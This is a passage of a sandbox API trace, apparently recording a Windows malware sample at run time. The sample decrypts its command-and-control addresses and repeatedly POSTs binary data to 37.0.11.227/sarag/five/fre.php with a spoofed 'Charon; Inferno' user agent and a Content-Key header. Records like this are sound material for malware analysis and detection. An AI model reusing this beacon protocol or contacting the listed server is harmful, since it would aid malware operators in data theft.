dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0275.260] GetProcessHeap () returned 0x690000 [0275.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0275.261] GetProcessHeap () returned 0x690000 [0275.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0275.261] GetProcessHeap () returned 0x690000 [0275.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0275.262] closesocket (s=0x858) returned 0 [0275.262] GetProcessHeap () returned 0x690000 [0275.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0275.262] GetProcessHeap () returned 0x690000 [0275.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0275.263] GetProcessHeap () returned 0x690000 [0275.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0275.263] GetProcessHeap () returned 0x690000 [0275.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0275.263] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1614) returned 0x858 [0275.265] Sleep (dwMilliseconds=0xea60) [0275.266] GetProcessHeap () returned 0x690000 [0275.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0275.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.268] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0275.282] GetProcessHeap () returned 0x690000 [0275.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0275.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.284] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0275.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.285] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.286] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.286] GetProcessHeap () returned 0x690000 [0275.287] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0275.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.289] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0275.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.290] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0275.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.291] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0275.291] GetProcessHeap () returned 0x690000 [0275.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0275.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.292] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.293] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.303] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.304] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.304] GetProcessHeap () returned 0x690000 [0275.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0275.304] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0275.304] GetProcessHeap () returned 0x690000 [0275.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0275.305] GetProcessHeap () returned 0x690000 [0275.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0275.306] GetProcessHeap () returned 0x690000 [0275.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0275.306] GetProcessHeap () returned 0x690000 [0275.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0275.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.307] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.313] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0275.320] GetProcessHeap () returned 0x690000 [0275.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0275.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.321] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0275.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.322] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.323] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.323] GetProcessHeap () returned 0x690000 [0275.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0275.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.325] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0275.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.326] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0275.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.327] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0275.327] GetProcessHeap () returned 0x690000 [0275.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0275.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.328] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0275.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.329] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0275.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.331] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0275.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.332] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0275.332] GetProcessHeap () returned 0x690000 [0275.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0275.332] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0275.332] GetProcessHeap () returned 0x690000 [0275.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0275.332] socket (af=2, type=1, protocol=6) returned 0x85c [0275.332] connect (s=0x85c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0275.365] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0275.365] GetProcessHeap () returned 0x690000 [0275.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0275.365] GetProcessHeap () returned 0x690000 [0275.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0275.366] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0275.366] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0275.366] GetProcessHeap () returned 0x690000 [0275.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0275.367] GetProcessHeap () returned 0x690000 [0275.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0275.367] GetProcessHeap () returned 0x690000 [0275.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0275.367] GetProcessHeap () returned 0x690000 [0275.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0275.368] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0275.369] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0275.369] GetProcessHeap () returned 0x690000 [0275.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0275.369] GetProcessHeap () returned 0x690000 [0275.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0275.369] send (s=0x85c, buf=0x6ad508*, len=242, flags=0) returned 242 [0275.370] send (s=0x85c, buf=0x6aba40*, len=159, flags=0) returned 159 [0275.370] GetProcessHeap () returned 0x690000 [0275.370] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0275.370] recv (in: s=0x85c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0275.447] GetProcessHeap () returned 0x690000 [0275.448] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0275.448] GetProcessHeap () returned 0x690000 [0275.449] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0275.450] GetProcessHeap () returned 0x690000 [0275.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0275.450] GetProcessHeap () returned 0x690000 [0275.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0275.451] closesocket (s=0x85c) returned 0 [0275.451] GetProcessHeap () returned 0x690000 [0275.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0275.451] GetProcessHeap () returned 0x690000 [0275.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0275.452] GetProcessHeap () returned 0x690000 [0275.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0275.452] GetProcessHeap () returned 0x690000 [0275.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0275.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1618) returned 0x85c [0275.454] Sleep (dwMilliseconds=0xea60) [0275.455] GetProcessHeap () returned 0x690000 [0275.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0275.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.457] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.464] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0275.470] GetProcessHeap () returned 0x690000 [0275.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0275.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.471] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0275.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.472] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.473] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.473] GetProcessHeap () returned 0x690000 [0275.474] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0275.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.475] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0275.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.475] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0275.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.477] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0275.477] GetProcessHeap () returned 0x690000 [0275.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0275.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.478] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.480] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.481] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.482] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.482] GetProcessHeap () returned 0x690000 [0275.482] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0275.482] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0275.496] GetProcessHeap () returned 0x690000 [0275.496] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0275.497] GetProcessHeap () returned 0x690000 [0275.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0275.497] GetProcessHeap () returned 0x690000 [0275.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0275.497] GetProcessHeap () returned 0x690000 [0275.497] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0275.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.498] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.515] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0275.521] GetProcessHeap () returned 0x690000 [0275.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0275.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.523] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0275.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.524] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.525] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.525] GetProcessHeap () returned 0x690000 [0275.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0275.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.527] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0275.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.528] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0275.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.528] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0275.528] GetProcessHeap () returned 0x690000 [0275.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0275.529] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.529] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0275.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.531] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0275.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.532] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0275.532] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.533] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0275.533] GetProcessHeap () returned 0x690000 [0275.533] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0275.533] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0275.533] GetProcessHeap () returned 0x690000 [0275.533] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0275.533] socket (af=2, type=1, protocol=6) returned 0x860 [0275.533] connect (s=0x860, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0275.564] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0275.564] GetProcessHeap () returned 0x690000 [0275.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0275.564] GetProcessHeap () returned 0x690000 [0275.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0275.565] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0275.566] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0275.566] GetProcessHeap () returned 0x690000 [0275.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0275.566] GetProcessHeap () returned 0x690000 [0275.566] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0275.567] GetProcessHeap () returned 0x690000 [0275.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0275.567] GetProcessHeap () returned 0x690000 [0275.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0275.568] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0275.568] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0275.568] GetProcessHeap () returned 0x690000 [0275.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0275.569] GetProcessHeap () returned 0x690000 [0275.569] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0275.569] send (s=0x860, buf=0x6ad508*, len=242, flags=0) returned 242 [0275.569] send (s=0x860, buf=0x6aba40*, len=159, flags=0) returned 159 [0275.570] GetProcessHeap () returned 0x690000 [0275.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0275.570] recv (in: s=0x860, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0275.654] GetProcessHeap () returned 0x690000 [0275.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0275.656] GetProcessHeap () returned 0x690000 [0275.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0275.656] GetProcessHeap () returned 0x690000 [0275.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0275.657] GetProcessHeap () returned 0x690000 [0275.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0275.657] closesocket (s=0x860) returned 0 [0275.663] GetProcessHeap () returned 0x690000 [0275.663] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0275.663] GetProcessHeap () returned 0x690000 [0275.663] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0275.663] GetProcessHeap () returned 0x690000 [0275.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0275.664] GetProcessHeap () returned 0x690000 [0275.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0275.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, 